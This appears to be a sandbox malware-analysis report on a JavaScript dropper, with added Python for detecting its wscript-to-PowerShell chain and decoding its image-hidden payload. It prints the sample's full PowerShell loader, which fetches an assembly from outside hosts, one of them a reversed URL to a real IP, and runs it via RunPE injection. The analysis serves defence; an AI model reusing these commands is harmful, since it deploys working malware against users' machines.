Analysis
-
max time kernel
119s
-
max time network
124s
-
platform
windows7_x64
-
resource
win7-20240419-en
-
resource tags
arch:x64 arch:x86 image:win7-20240419-en locale:en-us os:windows7-x64 system
-
submitted
18-06-2024 09:35
Static task
static1
Behavioral task
behavioral1
Sample
Data-Sheet.js
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
Data-Sheet.js
Resource
win10v2004-20240611-en
General
-
Target
Data-Sheet.js
-
Size
32KB
-
MD5
f83ca689e03194dae68a7c1c6dfcfaf4
-
SHA1
6dff0eb5bcbdde1450eee59363abfeb32996f0e9
-
SHA256
8ab47db42a777fa45a2eded252d0d3001a67efcff1cb9cc34b4d92d17800a020
-
SHA512
0f0aad4873fa57a8770a70e3aceeb354fa68a599139cd36a9aa41d778f71e2ec2053cb71065923b6266b4d4fdd6c00f0cd2b1217ba541b4078627f77899ab019
-
SSDEEP
384:/4bHOGs/AkVLg/U+/X/69tP5gHxSqU8HheWps/CsSI:/4b5s/AkVU/T/X/69tPuRSqFBeWpVsSI
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow | pid  | Process
4    | 2164 | wscript.exe
6    | 2164 | wscript.exe
10   | 2560 | powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid  | Process
2756 | powershell.exe
2560 | powershell.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid  | Process
2756 | powershell.exe
2560 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description             | pid  | Process
Token: SeDebugPrivilege | 2756 | powershell.exe
Token: SeDebugPrivilege | 2560 | powershell.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description                      | pid  | Process        | procid_target
PID 2164 wrote to memory of 2756 | 2164 | wscript.exe    | 28
PID 2164 wrote to memory of 2756 | 2164 | wscript.exe    | 28
PID 2164 wrote to memory of 2756 | 2164 | wscript.exe    | 28
PID 2756 wrote to memory of 2560 | 2756 | powershell.exe | 30
PID 2756 wrote to memory of 2560 | 2756 | powershell.exe | 30
PID 2756 wrote to memory of 2560 | 2756 | powershell.exe | 30
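The parent/child relations and command-line switches recorded in these signatures are enough to build a detection for the wscript.exe -> powershell.exe -> powershell.exe loader pattern. The Python below is an added example, not part of the sandbox report or of the sample: it walks constructed Sysmon-style process-creation events (fields modelled on Event ID 1: pid, ppid, image, command line) that mirror the chain in this report plus one made-up benign PowerShell session, and flags PowerShell processes whose command line carries the loader's markers or whose ancestry contains a script host. The indicator names, the score threshold and the sample events are my own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed process-creation events modelled on Sysmon Event ID 1 fields.
# The first four mirror the chain in the report; the last one is a made-up
# interactive admin session used as a control.
@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# (name, regex) pairs matched case-insensitively against the command line.
# Abbreviated switches (-w hidden, -ep bypass, -nop) are covered as well.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("base64_decode", re.compile(r"FromBase64String", re.I)),
    ("in_memory_assembly_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I)),
    # A second "powershell -" token that is NOT the first token of the line,
    # i.e. PowerShell re-launching itself from inside -command.
    ("nested_powershell", re.compile(r".+powershell(?:\.exe)?\s+-", re.I)),
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def suspicious_chains(events: List[ProcEvent], min_score: int = 2) -> Dict[int, dict]:
    """Return {pid: {"score", "indicators", "ancestry"}} for every PowerShell
    process that accumulates at least min_score indicators, counting a script
    host anywhere in its parent chain as one indicator."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        hits = [name for name, rx in INDICATORS if rx.search(e.cmdline)]
        # Walk the parent chain; bounded so malformed logs cannot loop forever.
        ancestry, cur, depth = [], e, 0
        while cur.ppid in by_pid and depth < 16:
            cur = by_pid[cur.ppid]
            ancestry.append(basename(cur.image))
            depth += 1
        if any(a in SCRIPT_HOSTS for a in ancestry):
            hits.append("script_host_ancestor")
        if len(hits) >= min_score:
            findings[e.pid] = {"score": len(hits), "indicators": hits, "ancestry": ancestry}
    return findings

SAMPLE_EVENTS = [
    ProcEvent(1234, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2164, 1234, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Data-Sheet.js"),
    ProcEvent(2756, 2164, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -command \"$Codigo = 'QUJD';$x = (New-Object System.Text.UTF8Encoding)"
              ".GetString([System.Convert]::FromBase64String($Codigo));"
              "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $x\""),
    ProcEvent(2560, 2756, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command "
              "\"$a = [System.Reflection.Assembly]::Load($bytes)\""),
    # Control: a plain admin session launched from Explorer. Not flagged.
    ProcEvent(3001, 1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -command \"Get-ChildItem C:\\Temp\""),
]

if __name__ == "__main__":
    for pid, info in suspicious_chains(SAMPLE_EVENTS).items():
        print(pid, info["score"], info["indicators"], "<-", " <- ".join(info["ancestry"]))
```

The control session scores only one indicator (-NoProfile) and has no script host above it, so the threshold of two keeps it out; the two PowerShell instances from the report score five and six because the hidden window, policy bypass and base64/Assembly.Load markers stack on top of the wscript.exe ancestor.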
Processes
-
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Data-Sheet.js
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2164
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2756
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ct/19.301.87.741//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
    Note on the stage-3 command: the first argument passed to RunPE.Home.VAI, 'txt.ct/19.301.87.741//:ptth', is 'http://147.78.103.91/tc.txt' written backwards; 'desativado' is Portuguese for 'disabled', and 'AddInProcess32' matches the name of the .NET Framework helper AddInProcess32.exe, which RunPE-style loaders use as the host for the payload they inject. Both entries in $links are the same URL, so the Get-Random shuffle is cosmetic and $downloadedData ends up holding two concatenated copies of the same file (IndexOf finds the first marker pair). The WriteProcessMemory IoCs above cover only each parent writing into the child it just created; no AddInProcess32 process appears in this run, so the injection itself is not evidenced by the report, and no network capture is reproduced here to show whether either host responded.
-
-
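The stage-3 PowerShell above is a container parser: it looks for <<BASE64_START>> and <<BASE64_END>> inside whatever the "image" URL returns, base64-decodes the slice between them, loads the result as a .NET assembly and hands a reversed URL to RunPE.Home.VAI. To decode a retrieved container offline without executing the loader, the same logic can be reproduced in Python. The following is an added example, not the sample's code and not part of the sandbox report: it searches the raw bytes instead of a UTF-8-decoded string (the markers are ASCII, so the result is the same, and binary JPEG bytes never trigger decoding errors), un-reverses the first VAI argument, and decodes a stage-2 $Codigo string the way stage 1 does. The sample image bytes and the fake payload are constructed here; the field names returned by describe_vai_args are my reading of the observed call, not a documented signature.

```python
import base64
import binascii
from typing import Optional

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"

def extract_payload(blob: bytes) -> Optional[bytes]:
    """Reproduce the loader's marker search on raw bytes and return the
    decoded payload, or None if the markers or the base64 are missing/invalid.
    Like the loader, only the first marker pair is used, so a blob holding
    several concatenated copies of the container yields the first payload."""
    start = blob.find(START_FLAG)
    if start < 0:
        return None
    start += len(START_FLAG)
    end = blob.find(END_FLAG, start)
    if end < 0:
        return None
    b64 = blob[start:end].strip()
    try:
        return base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None

def unreverse(s: str) -> str:
    """Undo the string reversal applied to the first VAI argument."""
    return s[::-1]

def decode_stage2(codigo_b64: str) -> str:
    """Stage 1 runs UTF8Encoding.GetString(FromBase64String($Codigo)); this
    returns the same PowerShell text for a given $Codigo value."""
    return base64.b64decode(codigo_b64).decode("utf-8")

def describe_vai_args(args):
    """Positional reading of the observed VAI call (an analyst interpretation,
    not a documented RunPE.Home.VAI signature): arg0 is the reversed payload
    URL, arg4 names the intended host process, the rest are 'desativado'
    (Portuguese for 'disabled') switches."""
    return {
        "url": unreverse(args[0]),
        "host_process": args[4],
        "switches": [a for i, a in enumerate(args) if i not in (0, 4)],
    }

# Constructed sample container: a JPEG-like header, the markers wrapping a
# base64 blob, then a JPEG end-of-image marker. The "assembly" is a fake
# MZ header followed by filler, not executable code.
FAKE_PAYLOAD = b"MZ\x90\x00" + b"not-a-real-assembly"
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + START_FLAG
                + base64.b64encode(FAKE_PAYLOAD) + END_FLAG + b"\xff\xd9")

# Arguments exactly as they appear in the report's stage-3 command line.
OBSERVED_VAI_ARGS = ("txt.ct/19.301.87.741//:ptth", "desativado", "desativado",
                     "desativado", "AddInProcess32", "desativado")

if __name__ == "__main__":
    payload = extract_payload(SAMPLE_IMAGE + SAMPLE_IMAGE)  # two copies, like the loader
    print("payload bytes:", len(payload), "starts with MZ:", payload[:2] == b"MZ")
    print(describe_vai_args(OBSERVED_VAI_ARGS))
```

When pointed at a real download, check the decoded bytes for an MZ header before feeding them to a .NET disassembler; a None result means the operator has rotated the marker strings or the hosting site has replaced the file.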
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
03ebea57ff7399a6ce1c0eb8378f0039
SHA1
aa09de405cd3c73a7922f8fb1aee99e6c2fd5a8d
SHA256
166297f2d44cecbdd8b072ece67f73c4e6d9c407d6926528e95dbcf7e32c3c8f
SHA512
02c4a3699124c1d16db449efbe6e01b8205bb3417c035cde5d230c414eade9dbb8a64449ba63dca9ebaf2f9c680e7dc16a74fc9a5a4e5af789f663ada4587884